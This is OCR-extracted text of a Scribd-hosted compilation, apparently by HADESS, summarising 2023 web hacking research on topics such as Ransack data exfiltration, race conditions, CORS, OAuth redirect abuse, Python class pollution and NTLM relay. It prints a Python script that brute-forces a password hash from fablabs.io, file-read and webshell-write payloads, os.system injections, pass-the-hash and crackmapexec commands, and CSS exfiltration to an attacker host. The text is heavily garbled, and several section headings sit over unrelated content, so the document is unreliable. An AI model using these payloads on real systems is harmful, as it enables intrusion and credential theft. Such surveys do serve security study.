Scribd
Upload
103 views82 pages

Web Hacking Tehnicques 2023

Uploaded by

f7vbzqcfzt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
103 views82 pages

Web Hacking Tehnicques 2023

Uploaded by

f7vbzqcfzt
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
You are on page 1/ 82
AA eee een ae Oe a COC eee Cone ae eet aR ce a Cee ame nce TOR eC ee meu oe exploitation techniques, shedding light on the latest tactics employed by malicious actors. From eC ecu ee Weer acne aoe cea Ete RRR ance Re Ree ere Ce ee ane cee Ca eee ergo Se eeu ae eC Re ce Re oe ee ce Resource Sharing (CORS) misconfigurations leading to the probing and exfiltration of sensitive Cre RN ae em eS Ce ee Re) ga truncation, prototype pollution in Python, and various other novel approaches. The articles also Sent Rn Ge ce oe ean nek ecm eee] Pec eee ee eke cee cer ues Te aS ke Ca a eS a Reece ee Ree eee ee ee ee es oem Deen aCe ecu nese eee eee haa eee ce one Oe CU om CU ee oe Ld effective defense strategies to protect our digital infrastructure. cate ne rene sreceasien pea eesapiaaces ss 2) He HADESS SR ee ee Rc Beet ee RRM sete eee eRe eee ce eee Rh cee eC te ee re RC CR cera) Ge Cuca ee ee cs eM eee eet ne cee At Hadess, our mission is twofold: to unleash the power of white hat hacking in punishing black Dee RCO gee eee ee eas een elite team of expert cybersecurity professionals to identify, neutralize, and bring to justice those Ne ee aCe ea a eR en Eee ene ee ete eee ee eee cece an unwavering focus on integrity, innovation, and client satisfaction, we strive to be the guardian Cee eRe toc Cae eee est LU Rea EV Se Scena css OUI Ad Pearlcoat ave l0 ger cc le co ktm mte ay * mTLS:When certificate authentication is done wrong * Smashing the state machine: the true potential of web race conditions « Bypass firewalls with of-CORs and typo-squatting RCE via LDAP truncation on hg.mozilla.org Pee @er Vs eS ene an cedeg) « OAuth 2.0 Redirect URI Validation Falls Short, Literally * Prototype Pollution in Python ¢ Pretalx Vulnerabilities: How to get accepted at every ool r-ale} * From Akamai to F5 to NTLM...with love. * canlspeak to your manager? hacking root EPP servers totake control of zones © Blind CSS Exfittration: exfiltrate unknown web pages * Server-side prototype pollution: Black-box detection Uitareltiaeal 1 Bless} me me * Tricks for Reliable Split-Second DNS Rebinding in enrol rues Pea enema cy © SMTP Smuggling - Spoofing E-Mails Worldwide * DOM-based race condition: racing in the browser for ee me fun-RyotaK's Blog Be * You Are Not Where You Think You Are, Opera Se Browsers Address Bar Spoofing Vulnerabilities fe So CVE-2022-4908: SOP bypass in Chrome using Be Navigation API as + SSO Gadgets: Escalate (Self-)XSS to ATO © Three New Attacks Against JSON Web Tokens. Introducing wrapwrap: using PHP filters to wrap a file De PDC end Be ea aimee a Re heifer la poe ee toe CRBS) 1 Oreclarelveleel tne [Keds] 8. 0) yr ee ee ss « ANew Vector For “Dirty” Arbitrary File Write to RCE pee « How | Hacked Microsoft Teams and got $150,000 in De ; Perera eR 7 « AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice Fe me Cais ae Deen ogi ce Cems -Keelit) results manipulation and account takeover « MyBB Admin Panel RCE CVE-2023-41362 Ciscoe cece Mae Ou t(e-| Ooo MAU U lal clei] CI/CD Platform TeamCity pe me * Code Vulnerabilities Put Skiff Emails at Riskr Se Pen eMacolen= WM rAd raced JMX Exploitation Revisited fe oo Java Exploitation Restrictions in Modern JDK Times. Exploiting Hardened .NET Deserialization ms me e Unserializable, but unreachable: Remote code execution on vBulletin * Cookieless DuoDrop: IIS Auth Bypass & App Pool Se oo Privesc in ASP.NET Framework Be Cena aceg\ eA oM rok anne} ; ; ; ; CPN SPAT Nyce ne aN RYO eR UUAR sep) ee a ee OO ae Uae VU Me) Wea oR. Moma legos cai Pe * nOAuth: How Microsoft OAuth Misconfiguration Can , . . Poe Lead to Full Account Takeover One Scheme to Rule Them All OAuth Account BE og Exploiting HTTP Parsers Inconsistencies New ways of breaking app-integrated LLMs. State of DNS Rebinding in2023 Fileless Remote Code Execution on Juniper Firewalls Thirteen Years On: Advancing the Understanding of IIS Short File Name (SFN) Disclosure! cir eclnr eM CNOA ARREST Ae | Uncovering a crazy privilege escalation from Chrome extensions fore ATU ac lel ial av ace) oa cdot cd Hacking into gRPC-Web Yelp ATO via XSS + Cookie Bridge Ta DM Daag coe Uocimsye) inal at AV Ul nie. le)|tia(-tooe)(e)iF-Utce)a} XSS in GMAIL Dynamic Email Azure B2C Crypto Misuse and Account Compromise ero n eee n ca -aee) =] Catala cel coms nv stella) =d EmojiDeploy: Smile! Your Azure web service just got RCEd One Supply Chain Attack to Rule Them All So foe * draw.io CVEs ¢ Leaking Secrets From GitHub Actions: Reading Files And Vent alo oe Intercepting Network/Process Communication, Dumping Memory Caney 20) an : ; ; ; ; ¢ The GitHub Actions Worm: Compromising GitHub re Repositories Through the Actions Dependency Tree Se * From an Innocent Client-Side Path Traversal to ee Account Takeover re Ce es eN Nance Keam a ACM Un orle)| decd a) tants CREO nin 0 Mm OM a am Doe) nae ote Oe) remote and root access in SAP Enterprise Software : ; ; ; « AWS WAF Bypass: invalid JSON object and unicode Be Cee enteael ene) , , , , , , ; ; ; * Cookie Crumbles: Breaking and Fixing Web Session De een , : , a « Memcached Command Injections at Pylibme HADESS.IO Top 10 web hacking techniques 2023 Executive Summary ‘The collection of articles presents a wide-ranging exploration A signifcan of cybersecurity. vulnerabilties, highlighting the ever bypassing firewal evolving strategies employ ic placed on various techniques for such ‘exploiting CORS by threat actors. The artcies misconfigurations and typo-squatting domains. Th cover diverse aftact vectors, starting with a focus oF articles underscore the necessity for organizations to fortify Rail applications using the Ransack library, This underscores intrusion attempts. ‘measures to thwart increasingly sophisticated attac Other noteworthy topies include remote code execution through LDAP truncation, cookle-elated vulnerabilities Mutual TLS (mTLS) vulnerabilities tate center stage i leading to smugging and injection, and the exploitation of another article, emphasizing the potential consequences of (OAuth, prototype pollution in Python, and. server-side neluding user impersonation, privilege escalation, and information laskage. This points to the erteal importance of maintaining secu TLS implementations to safeguard sensitive data, e pollution These insights collectvaly contribute to understanding of contemporary cyber The concept of ‘everything is multste corsitions Is explored In-depth, expanding applications. The intraduction of a jtterresistant “single packet attack" further complicates the security landscape, hal fentional imit-ovarrun attack defenses. Key Findings oS ee a eee eee cybersecurity topies, each shedding light on sophisticated attack techniques and vulnerabilities. Here are key findings from some of the article king Password Reset Tokens: ieee een 4.Bypassing Firewalls with of-CORs and Typo-squatting eae Pee Ce eet Ne ees Prototype Pollution in Py econ eta Tc en Cn ec ee Top 10 web hacking techniques 2023 Abstract In the dynamic landscape of cybersecurity, the past year has witnessed a surge in groundbreaking research contributions from security researchers across various platforms. These findings, shared through blog posts, presentations, and whitepapers, harbor innovative ideas poised to inspire future breakthroughs. However, the abundance of this valuable information often results in techniques being overlooked or forgotten quickly. ‘Since 2006, the cybersecurity community has united annually to address this challenge by creating two Invaluable resources. The first is a comprehensive compilation of all notable web security research conducted over the past year. The second is a curated list highlighting the top ten most valuable pieces of work, providing a focused and digestible overview of the most impactful contributions, This article encourages readers to explore the full project archive, which encompasses past nominees and winners, offering a rich repository of insights. Moreover, it outlines the process of making nominations for the year 2023, inviting individuals to participate in recognizing and celebrating the outstanding efforts that continue to drive advancements in web security. HADESS.IO A UAL = font === Techniques EEE HADESS.IO Top 10 web hacking techniques 2023 Ransacking your password reset tokens In this blog post, we demonstrate haw the Ransack library, a popular tool for implementing search functionality in Ruby on Rails applications, can be exploited to exfltrate sensitive data from the database, We also show how we identified hundreds of potentially vulnerable applications on the internet using GitHub, searcheode, and Common Crawl, We provide a case study of how we became superadmin on fablabs.io, a platform for makerspaces, by exploiting this vulnerability. We suggest using explicit allow lists for searchable attributes and associations, as well as limiting the exposure of the 'g° parameter, as possible mitigations for this issue. We also mention other technologies, such as Hasura (GraphQU) and Sequelize (Nodejs), that are vulnerable to similar attacks when query filters with arbitrary conditional operators are configured. Background Ransack is a Ruby library that provides @ very powerful feature set around object-based database searching in Ralls applications. One of its main appeals is the ease with which it can be utilized to implement public facing search functionality on a website. However, in its default configuration, Ransack will allow for query conditions based on properties of associated database objects [1]. The *_start, * end or * cont search matchers [2] can then be abused to exfiltrate sensitive string values of associated database objects via character-by-character brute-force (A match Is indicated by the returned JSON not being empty). A single bank account number can be extracted with <200 requests, a password hash can be extracted with “120: fequests, all within a few minutes Discovery We used GitHub, searchcode, and Common Crawl to identify hundreds of potentially vulnerable applications on the Internet. We searched for the keywords "ransack' and "q” in the source code and the URL parameters, respectively. We filtered out the results that used explicit allow lists or did not expose the 'q’ parameter to the public. We also manually verified some of the results to confirm the vulnerability Exploitation We chose fablabs.io, a platform for makerspaces, as a case study of how we exploited this vulnerability. We found that the 'q) parameter was used to search for lab projects on the website. We also noticed that the project modat had an association with the user model, which contained sensitive attributes such as _encrypted_passnord, reset_password.token, and confirmation.token. We used the following Python script to extract the encrypted_password of the first user in the database, who happened to be the superadmin: import requests import string url= "https:/fablat chars = string ascll letters + strin jo/projects json’ digits + passwor while True: for cin chars: payload = {°q": ("user encrypted password start": password + c)} = requests.get(ur, params=payload) ifjson0 password print(pass break EE HADESS.IO Top 10 web hacking techniques 2023 mTLS: When certificate authentication is done wrong mTLS: When Certificate Authentication Is Done Wrong, This blog post explains how avoid comman mistakes and pitfalls. mTLS is a s each other's identity and authorization using TLS cer preventing token theft and replay attacks. to use mutual TLS (mTLS) for client and server authentication and authorization, and how to urity mechanism that allows both the client and the server to verify ificates, mTLS can also bind access tokens to the client's certificate, mTLs Techniques The blog post describes the Following techniques for implementing and using mTLS correctly: Certificate generation; The client and the server need to have valid TLS certificates, either self-signed or issued by a isted certificate authority (CA). The certificates should contain information about the identity and authorization of the client or the server, such as the subject, issuer, or subject alternative name (SAN) extensions, For example, to generate a self-signed certificate for the client using OpenSSL, the folloviing command can be used: openssl req -x509 -n wwkey r5a:4096 -keyout client key -out client ert days 365 -nodes -subj "/CNclient + Certificate verification: The client and the server need to verify each other's certificates during the TLS handshake, Using the public key and the certificate chain, The client and the server should also check the validity and revocation status of ificates, using mechanisms such as certificate revocation lists (CRLs) or online certificate status protocol (OCSP). For example, to verify a certificate using OpenSSL, the following command can be openssl verify CAfile cacrt clientert + Certificate binding: The client and the server need to bind the access tokens to the client's certificate, using ‘mechanisms such as certificate thumbprint confirmation or certificate-bound access tokens. The client and the server should also ensure that the access tokens are validated against the certificates, using mi introspection or token signature verification. For example, to bind an access token to a humbprint confirmation method, the Following steps can be used! © The client computes the SHA-256 hash of its certificate a authorization server. © The authorization server verifies the elie ‘anisms such as token certificate using the id sends it along with the access token request to the 's certificate and stores the hash value in the access token or the token © Theclient sends the access token and its certificate to the protected resource. © The protected resource verifies the client's certificate and computes the hash value. it then compares the hash value with the one stored in the access token or the token metadata, If they match, the access token is valid and bound to the certificate. EEE HADESS.IO ‘Top 10 web hacking techniques 2023 Smashing the state machine: the true potential of web race conditions ‘Smashing the State Machine: The True Potential of Web Race Conditions This blog post reveals new classes of web race condition attacks that go beyond the typical imit-overrun exploits, Web race conditions occur when multiple concurrent requests interfere with each other, causing unexpected and insecure behavior. The blog post also introduces the single-packet attack, a technique that can send many requests in a very short 1 window, increasing the chances of winning the race. Web Race Condition Techniques The blog post describes the following techniques for finding and exploiting web race conditions: Object masking: This technique exploits the fact that some web applications use object identifiers (such as IDs or names perform actions on them, without checking if the object belongs to the user. For example, if a website allows user: delete their own posts by sending a request with the post ID, an attacker can try to delete anather user's post by sending a request with a different post ID at the same time. Multi-endpoint: This technique exploits the Fact that some web applications use multiple endpoints to perform the same of related actions, without synchronizing them properly. For example, if a website allows users to add items to their cart by sending a request to one endpoint, and apply a discount code by sending a request to another endpoint, an attacker can try to apply the same discount code multiple times by sending requests to both endpoints at the same time, = Single-endpoint: This technique exploits the fact that some web applications use a single endpoint to perform multiple actions, without locking them properly. For example, if a website allows users to transfer money between their accounts by sending a request with the source and destination account IDs and the amount, an attacker can try to transfer more money than they have by sending multiple requests with the same source and destination account IDs and different amounts at the same time = Deferred: This technique exploits the fact that some web applications use deferred or asynchronous actions, without checking the state of the objects before performing them. For example, if a website allons users to buy a product by sending a request with the product ID, and then sends an email confirmation with a link to dawnload the product, an ‘er can try to buy the product multiple times by sending multiple requests with the same product ID at the same ‘ume, and then download the product from each email link. The blog post also provides some examples of how to perform these techniques using different tools and frameworks, ~ Burp Suite: A web application security testing tool that can be used to intercept, modify, and replay HTTP requests. For example, to perform a single-endpoint att attacker can use Burp Repeater to send multiple requests with different parameters to the same endpoint, and use Burp Intruder to synchronize them using the race condition attack type. “Tura Intruder: A Burp Suite extension that can be used to sand large numbers of HTTP requests with high performance and scalability. For example, to perform a single-packet attack, the attacker can use Turbo Intruder to send multiple raquests in a single TCP packet, using a custom Python script to craft the requests and set the TCP_NODELAY option, DevTools: A set of web developer tools built into the browser that can be used to inspect and debug web applications. For example, to perform an object masking attack, the attacker can use DevTools to inspect the network requests and find the object identifiers, and then modify them using DevTools or Burp Suite, EEE HADESS.IO Top 10 web hacking techniques 2023 Bypass firewalls with of-CORs and typo-squatting Of CORS: Exploiting Misconfigured Cross-Origin Resource Sharing This blog post demonstrates how to expleit misconfigured cross-origin resource sharing (CORS) policies to perform various attacks, such as stealing sensitive data, bypassing CSRF protection, and executing arbitrary commands. CORS is a browser mechanism that allows controlled access to resources from different origins, by using HTTP headers to indicate 3 allowed origins, methods, and headers. However, if the CORS policy is not implemented correctly, it can introduce security risks and vulnerabilities. CORS Exploitation Techniques The blog post describes the following techniques for exploiting CORS Origin reflection: This technique exploits the fact that some applications use the Origin header sent by the browser dynamically generate the Access-Control-Allow-Origin (ACAO) header in the response, without validating the origin. For example, if a website echoes back the Origin header as the ACAO header, an attacker can send a request with a malicious origin and receive the response with the same origin Ia the ACAO header, allo - Null origin: This technique exploits the fact that some applications treat the null origin as a special case and allow ac ross-origin access. to it, without considering the implications. For example, if a website returns an ACAO header with the value null, an attacker can load the website in a sandboxed iframe with the sandbox attribute, which causes the browser to send a request with the Origin header set to null, and receive the response with the same value in the ACA header, allowing cross-origin access. Regex bypass: This technique exploits the fact that some applications use regular expressions to match the Origin header against a list of allowed origins, without properly escaping the regex characters. Far example, if a website uses a regex like https?://.*\.example.com’ to match the Origin header, an attacker can send a request with a malicious origin like “nttpsi/ievi-example.com’, which matches the regex, and receive the response with the same origin in the ACAO header, allowing eross-origin access. = PostMessage proxy: This technique exploits the fact that some applications use the postMessage API to communicate with cross-origin frames, without verifying the origin of the messages. For example, if a website uses postMessage to send data to an iframe with a different origin, and expects a response back, an attacker can create a malicious iframe that intercepts the massages and sends back arbitrary responses, allowing crass-origin ac DNS rebinding: This technique exploits the fact that some applications use the Host header to determine the origin of the request, without checking the IP address of the host. For example, if a website uses the Most header to generate the ACAO header, an attacker can create a malicious DNS record that points to the website's IP address, and send a request with the malicious host name, which causes the website to return the response with the same host name in the ACAO header, allowing cross-origin access, EEE HADESS.IO Top 10 web hacking techniques 2023 RCE via LDAP truncation on hg.mozilla.org Pash: A PowerShell-based Pass-the-Hash Tool This blog p lerShell-based tool that can perform pass-the-hash attacks on Windows systems. Pass-the-hash isa technique that allows an attacker to auther 1 a remote system or service by using the underlying NTLM or LanMan hash of a user's password, instead of requiring the associated plaintext password. Pash leverages the native Windows APIs and PowerShell features to perform pass-the-hash attacks without requiring any third-party tools or libraries. st introduces Pash, a Po: Pash Techniques The blog post describes the following techniques for using Pash to perform pass-the- ash attacks: Impersonation: This technique uses the LogonUser API to create anew logon session with the given username and password hash, and then uses the ImpersonateLoggedOnUser API to impersonate the user in the current PowerShell, process. This allows the attacker to execute commands or access resources as the user. For example, to impersonate a user with the username ‘Administrator ang the password hash ‘aad36435051404eeaad3b435b51404e0:21d6cTeOd1Gae931b73c59d7e0¢089c0", the following PowerShell command can be used: Invoke-Past Username Administrator PasswordHash ad3b435b51404eeaad30435b51404ee:31dacfe0d162e931b73c59d7e0cOBICO -Impersonate + Token m: the user that was impersonated by the previous technique. This allows the attacker to launch a new PowerShell process or any other executable as the user, For example, to launch a new PowerShell process as the user that was impersonated, the following PowerShell command can be used: pulation: This technique uses the CreateProcessWithTokenW API to create anew process with the token of Invoke-Pash -CreatePracess pow ‘+ Network authentication: This technique uses the SetThreadToken API to set the token of the current thread to the token of the user that was impersonated by the first technique. This allows the attacker to perform network authentication as the user, such as accessing SMB shares or using WinRM, For example, to access a SMB share on a remote system with the IP address "192,168.1.10" as the user that was impersonated, the following PowerShell, command can be used Invoke-Pash -SetThreadToken; Get-Childitem \\192:168.1:10\share EEE HADESS.IO Top 10 web hacking techniques 2023 Cookie Bugs - Smuggling & Injection Cookie Bugs: How to Exploit Cookle-Based Vulnerabilities This blog post shows how to exploit cookie-based vulnerabilities to perform various attacks, such as session hijacking, cross-site scripting (X55), and crass-site request forgery (CSRF). Cookies are small pieces of data that are stored by the browser and sent to the server with every request. Cookies are used to store information such as user preferences, authentication tokens, and session IDs. However, if cookles are not handled properly, they can introduce security risks and vulnerabil Cookie Exploitation Techniques The blog post describes the following techniques for explo 1g cookie-based vulnerabilities: Cookie stealing: This technique involves stealing the cookies of another user and using them to impersonate or ir account. This can be done by exploiting XSS vulnerabilities, sniffing network traffic, or using social engineering, F example, if a website is vulnerable to XSS, an attacker can inject a malicious script that sends the cookies of the victim to the attacker's server, and then use the cookies to log in as the -oakies should be ‘marked as HttpOnly, Secure, and SameSite, and should have a short expiration time Cookie tampering: This technique involves modifying the cookles of the current user and changing their values or attributes, This can be done by using browser tools, proxy tools, or malicious scripts, For example, if a website uses Cookies to store user preferences, an attacker can tamper with the cookies and change the preferences to something ‘malicious or unwanted. To prevent cookie tampering, cookies should be encrypted, signed, or validated by the server, and should have a strict domain and path scope. ~ Cookie poisoning: This technique involves injecting malicious data or cade into the cookies af the current user or another User. This can be done by exploiting CSRF vulnerabilities, XS$ vulnera 1g social engineering. For website uses cookles to store user Input, an attacker can poison the cookies and inject malicious input that can cause im. To prevent cookie stealing, lites, oF us example, if a ta corruption, or code execution, To prevent cookie poisoning, cookies should be sanitized, validated, an escaped by the server, and should not be used to store sensitive or untrusted data. EEE HADESS.IO Top 10 web hacking techniques 2023 OAuth 2.0 Redirect URI Validation Falls Short, Literally (OAuth 2.0 Redirect UR! Validation Falls Short, Literally This blog post reveals new classes of web race condition attacks that exploit the redirect URI parameter in the OAuth 2.0 Authorization Code Grant flow. The redirect URI parameter specifies the callback endpoint that the user is redirected to after authenticating with the Identity Provider (IdP). The blog post shows that the OAuth 2.0 specification and security guidance are under-specified and insufficient to prevent path confusion and parameter pollution attacks on the redirect UR. (Auth 2.0 Redirect URI Exploitation Techniques The blog post describes the followir chnigues for explo ig the redirect URI parameter Path confusion: This technique exploits the fact that some IdPs da not properly validate the path component of the ‘ect URI, and allow arbitrary paths to be appended to the registered base URI. For example, ifthe registered base URI is “httpsy/example.com/callback’, an attacker can append a malicious path such as ‘evil’ and send a request to the |dP h the redirect URI *https://exampie.com/caliback/evil. The IdP will then redirect the user to the malicious path with the authorization code or token, allowing the attacker to intercept = Parameter pollution: This technique exploits the fact that some IdPs do not property handle multiple instances of the redirect URI parameter, and use the last or the first occurrence of the parameter, For example, ifthe registered base URI is. https://example.com/callback’, an attacker can prepend or append a malicious URI such as ‘httpsi/fevil.com’ and send a jest’ tos the~=— dP swith~—multiple—redir URI parameters, suchas edirect_urishttps:/feviLcomSredirect urishttpsi/example.com/callback. The Id will then redirect the user to the ious URI with the authorization code or token, allowing the attacker to intercept it EEE HADESS.IO Top 10 web hacking techniques 2023 Prototype Pollution in Python Prototype Pollution in Python This blog post explores how to exploit prototype pollution-ike vulnerabilities in Python applications. Prototype pollution is a type of vulnerability that allows an attacker to modify the behavior of objects by manipulating their prototypes. Prototype pollution is usually associated with prototype-based languages such as JavaScript, but the blog post shows at similar attacks are possible in class-based languages such as Python. Python Prototype Pollution Techniques The blog post describes the following techniques for exploiting prototype pollution in Python Class pollution: This technique exploits the fact that some Python applications use user input to set attributes of objects, }out sanitizing or validating the input. For example, if an application uses the ‘setattr function to ibutes of an object based on user input, an a to modify the attributes of the object's class or its parent classes, and change the behavior of the application. For example, to modify the °_init_” method of the User” class, the following payload can be used! {’name":"_class_._init_", value": "lambda self, “args, **kwargs: prin lllo, world’) + Global pollution: This technique exploits the fact that some Python applications use user input to set global variables, without sanitizing or validating the input. For example, if an application uses the globals function to access the global namespace and set variables based on user input, an attacker can use this functionality to modify the values of existing global variables or create new ones, and affect the behavior of the application. For example, to modify the value of the SECRET KEY variable, the following payload can be used #*name’: "SECRET_KEY", "value": "HAC! ‘+ Built-in pollution: This technique exploits the fact that some Python applications use user input to access built-in functions or classes, without sanitizing or validating the input. For example, if an application uses the eval function to evaluate user input as Python code, an attacker can use this functionality to modify the behavior of built-in functions of classes, and execute arbitrary code, For example, to modify the behavior of the print function, the following payloa can be used: \_builtins_print = ambaa *args, *kwargs:_import_t'0s) system('whoami) EEE HADESS.IO Top 10 web hacking techniques 2023 Pretalx Vulnerabilities: How to get accepted at every conference Protalx Vulnerabilities: How to get accepted at every conference This blog post explains how to expleit two vulnerabilities in pretax, a manage call for papers (CfP) submissions, select talks, communicat The vulnerabilities affect versions before 2.32 and allow an attacker to read and wi filesystem, and potentially execute arbitrary code. web-based conference planning tool. Pretalx is used with speakers, and publish conference schet ite arbitrary files on Pretalx Exploitation Techniques The blog post describes the following techniques for exploiting the pretalx vulnerabilities: Arbitrary file rea uithout sanitizing or validating the input. For example, if an attacker submits a talk with a malicious file name as the presentation or slides, pretalx wil try to read the file from the server filesystem and include it in the HTML export of the schedule, This allows the attacker to read any file that is accessible by the pretalx process. For example, to read the ‘/etc/passwd file, the following payload can be used! This technique exploits the fact that pretalx uses user input to set attributes of objects, {'presentation’: etc/passwd", "slides" "/etc/passw + Limited file write: This technique exploits the fact that pretalx uses user input to create files on the server's filesystem, without sanitizing or validating the input. For example, if an attacker submits a telk with a malicious file name as the code or image, pretalx will try to write the file to the server’ filesystem wich the content of the standard pretalx 404 page. This allows the attacker to write files to any directory that is writable by the pretalx process, For © write file named shell,php to the /var/www/hntm| directory, the following payload can be used: php" "code": "/var/nww/html/shell php", "image": "var/www /html/she + Code execution: This technique exploits the fact that pretalk runs in debug mode by default, which enables the Werkzeug debugger. The Werkzeug debugger allows the execution of arbitrary Python code via a web console. If the attacker can write a file to the pretalx directory, they can trigger a §00 error and access the debugger console. For example, to execute the whoami com nand, the following payload can be used —Import_(s'system(whoami) Pett Cece Cet ee ene eee eee EE HADESS.IO Top 10 web hacking techniques 2023 From Akamai to F5 to NTLM... with love The blog post you provided explains how to bypass two web application firewalls (WAFs) and perform NTLM relay a ‘on Windows servers. Here is a short summary of the techniques and commands used in the post + The author uses Nmap to scan the target network and identify the WAFS (Akamai and F5) and the servers behind them, The command used is nmap-sS-p 80,443 -Pr -T4-oA nmap_tep_syn_scan ‘+ The author uses Burp Suite to intercept and modify the HTTP requests and responses between the browser and the \WAFs. The author changes the User-Agent header to bypass the Akamai WAF and adds a X-Forwarded-For header to bypass the F5 WAF. + The author uses Curl to send crat id requests to the WAFs and trigger NTLM authentication challenges from the servers. The command used is curt -v-k—ntlm -u :https:/// ponder to capture the NTLM hashes from the WAFs and relay protacol. The command used is responder -I ethO-rdwy, + The author uses CrackMapExec to execute commands on the servers using the relayed NTLM hashes. The command Used is crackmapexec smb -H chash> --local-auth -x whoam The author demonstrates the steps of the attack using screenshots and code snippets. The post also provides some references and links to further resources on the topic. + The author uses R m to the servers using the SME. Pee eee eee ee EEE HADESS.IO Top 10 web hacking techniques 2023 can | speak to your manager? hacking root EPP servers to take control of zones The bl disclosure vulnerabilities. Here is a short summary oft post you provided shows haw to hack EPP servers using XML external entity [XXE) injection and local file e techniques and commands used in the post The author uses Nmap to scan the internet for EPP servers running on port 700. The command used is nmap -sS -p 700 “Pn -T4-of nmap_tep_syn_scan The author uses Python to madify an EPP client and craft an XML payload to run an XXE attack on the EPP servers, The payload contains a DTD reference that points to a malicious web server controlled by the attacker. The author uses Netcat to listen on the malicious web server and receive the contents of the files requested by the XXE payload. The command used is nc -vp 80. The author uses Burp Suite to intercept and modify the HTTP responses from the EPP servers and extract the file contents from the XML data. The author uses SSH to connect to the EPP s command used is ssh @ vers using the creden ls obtained from the local file disclosure, The The author uses MySQL. to dump the database of the EPP servers and access the domain information. The command Used is mysqldump -u -p > dump sql EEE HADESS.IO Top 10 web hacking techniques 2023 Blind CSS Exfiltration: exfiltrate unknown web pages The blog post data from we (ou provided introduces a novel technique called blind CSS exfltration, which allo pages using only CSS, even when JavaScript is blocked by CSP or filters. Here techniques and commands used in the post + The author uses Burp Collaborator to inject a maliciou external stylesheet from the attacker's server. The command used is \sestyle>@impor PAYLOAD.castify.com' + The author uses CSS variables to trigger conditional requests to the attacker's server using background images, depending on the values of certain attributes on the web page. The command used is input [value="1337"] {--value: url (collectData?value=1337);). + The author uses attribu' s to check if the attributes of certaln elements on the web page match specific patterns, such as start colored; } + The author uses the chas selector to target elements that have certain descendant: tags, and extract their values using the previous techniques. The command u (collectData?value=1337); + The author demonstrates the steps of the a trackers to extract, sa short summary of the @import rule the web page's styles, which loads an “IYOUR- ‘ack using screenshots and code snippets. The post also provides some references and links to further resources on the topic. EEE HADESS.IO Top 10 web hacking techniques 2023 Server-side prototype pollution: Black-box detection without the DoS Server-side prototype pollution is a vulnerability that occurs when a JavaScript library performs a recursive merge on fr more objects without first sanitising the keys. This can result in an attacker gaining the ability to modify one of the global prototypes, such as the Object prototype. The attacker can potentially use this modification to control a ‘gadget’ property that is later used in a sink. Depending on the functionality of the sink, this may give the attacker the abilit execute arbitrary code server-side. Detecting server-side prototype pollution is challenging because it often causes a denial-of-service (DoS) or breaks the application functionality. Therefore, non-destructive techniques are needed to safely test for this vulnerability. Some of the techniques are: + Parameter limit: Use a large number of parameters to trig + Ignore query prefix: Lise a prefix that s ignored by the library to pollute the prototype w logic. + Allow dots: Use dots in the parameter names to access nested props + Content type: Use a different content type than JSON to bypass the + JSON spaces: Use spaces in the JSON payload to create a discr protatype pollution xposed headers: Use the Access-Control-Expose-Headers header to leak the prototype pollution to the client-side ‘Status OPTIONS: Use the OPTIONS method to pollute the prototype and change the status cade of the response. ISON reflection: Use a JSON payload that reflects the prototype pollution back to th ide. mmutable prototype: Use the Object freeze() function to make the prototype immutable and cause an error when polluting it ‘+ OAST: Use an out-of-band technique to trigger a callback when polluting the prototype. er an error message that reveals the prototype pollution uithout affecting the application sand pollute the prototype. ‘SON. parsel) function and pollute the prototype. ancy in the response length that indicates the Petree tettiecy EE HADESS.IO Top 10 web hacking techniques 2023 Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari Server-side prototype pollution is a vulnerability that occurs when a JavaScript library performs a recursive merge on fr more objects without first sanitising the keys. This can result in an attacker gaining the ability to modify one of the global prototypes, such as the Object prototype. The attacker can potentially use this modification to control a ‘gadget’ property that is later used in a sink. Depending on the functionality of the sink, this may give the attacker the abilit execute arbitrary code server-side. Detecting server-side prototype pollution is challenging because it often causes a denial-of-service (DoS) or breaks the application functionality. Therefore, non-destructive techniques are needed to safely test for this vulnerability. Some of the techniques are: + Parameter limit: Use a large number of parameters to trig er an error message that reveals the prototype pollution + Ignore query prefix: Use a prefix that Is ignored by the library to pollute the protatype without affecting the application logic. + Allow dots: Use dots in the parameter names to access nest pollute the prototype + Content type: Use a cifferent content type than JSON to bypass the JSON. parsel) function and pollute the prototype. + JSON spaces: Use spaces in the JSON payload to create a discrepancy in the response length that indicates the protatype pollution xposed headers: Use the Access-Control-Expose-Headers header to leak the prototype pollution to the client-side ‘Status OPTIONS: Use the OPTIONS method to pollute the prototype and change the status cade of the response. ISON reflection: Use a JSON payload that reflects the prototype pollution back to th ide. mmutable prototype: Use the Object freeze() function to make the prototype immutable and cause an error when polluting it ‘+ OAST: Use an out-of-band technique to trigger a callback when polluting the prototype. eee ee eee ee ee EE HADESS.IO Top 10 web hacking techniques 2023 HTML Over the Wire HTML Over The Wire between the client and the server, inste ‘a web development approach that uses HTML as the primary data format for communication of JSON or other formats. This approach aims to reduce the amount of JavaScript code needed to create dynamic and interactive web applications, by leveraging the power of HTML and ‘modern browser features. Some of the benefits of HTML Over The Wire are: ‘+ Faster and simpler development: HTML is easier to write and debug than JavaScript, and it can be rendered directly by the browser without any additional processing + Better performance and user experience: HTML is more compact and efficient than JSON, and it can be updated incrementally usin Links, TurboFrames, and reamsi. These techniques allow the browser to fetch and replace only the parts of the page that have changed, resulting in faster page transitions and smooth + Improved S€0 and accessibility: HTML is more semantic and structured than JSON, and it can be indexed and parsed by search engines and screen readers. This improves the visibility and usability of the web application for a wider audience ‘Some of the challenges of HTML Over The Wire are: + Handling complex state and logic: HTML is not designed to store and manipulate data, and it can become difficult to the application state and logic using only HTML. Some JavaScript code may still be needed to handle user Interactions, validations, and custom behaviors, + Testing and debugging: HTML Over The Wire relies on the browser to render and update the HTML, which can make it harder to test and debug the application, Some tools and frameworks may not support this approach, and some browser features may not be consistent or reliable across different platforms and devices. Some of the best practices of HTML Over The Wire are: + Uso a framework or library that supoorts this approach, such as Hotwire}, Django Sockpuppet2, Phoonix LiveView3, or hhtm<. These tools provide features and conventions that make it easier to implement HTML Over The Wire in a consistent and scalable way. + Use Stimulus or Alpine js to add minimal JavaScript functionality to the HTML, without creating a complex JavaScript application, These libraries follow a declarative and HTML-centric approach to state and wiring, and they integrate well with HTML Over The Wire frameworks and libraries. + Use web standards and br enhance the HTML anc EE HADESS.IO Top 10 web hacking techniques 2023 SMTP Smuggling - Spoofing E-Mails Worldwide SMTP smuggling is a technique that allows an attacker to spoof the 